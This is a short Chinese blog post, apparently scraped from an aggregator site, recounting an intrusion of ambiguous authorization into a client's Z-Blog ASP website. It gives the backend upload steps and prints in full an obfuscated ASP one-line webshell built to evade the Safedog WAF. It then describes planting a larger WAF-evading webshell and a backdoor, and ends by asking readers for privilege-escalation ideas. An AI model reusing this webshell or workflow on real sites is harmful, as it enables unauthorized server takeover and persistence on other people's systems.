[ 目录 ]
0×00 事件起因
0×01 经过
0×02 总结
0×00 事件起因
我们公司客户的网站,
一次似白不白,似黑不黑的网站入侵渗透检测
。有了后台帐号密码,admin权限,z-blog asp的程序,我就下载了看了z-blog php 研究了一下后台拿SHELL,发现这个程序后台拿SHELL好简单。1) 方法一:全局设置—更改上传文件类型—附件上传
2) 方法二:
主题修改;php版
Asp版不一样,我百度了一下,我去发现一大把
0×01经过
后台上传;一句话:直接更改.log后缀
上传过狗一句话绕过成功
“<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%>”
到一上传大马的时候,也遇见了上传一句话同样的问题!
Asp包含上传通过,
电脑资料
《一次似白不白,似黑不黑的网站入侵渗透检测》(https://www.unjs.com)。 text.txt大马起先一直没有搞定。朋友一起甩我一个过狗大马直接秒杀!
0×02 总结
发现各种过狗大马的大牛就是吊,鸣谢小乐天大牛指导!最后附上过狗大马截图,求提权思路
虽然服务有后门,远程连接不上!3389打开的,应该是被什么东西阻挡了!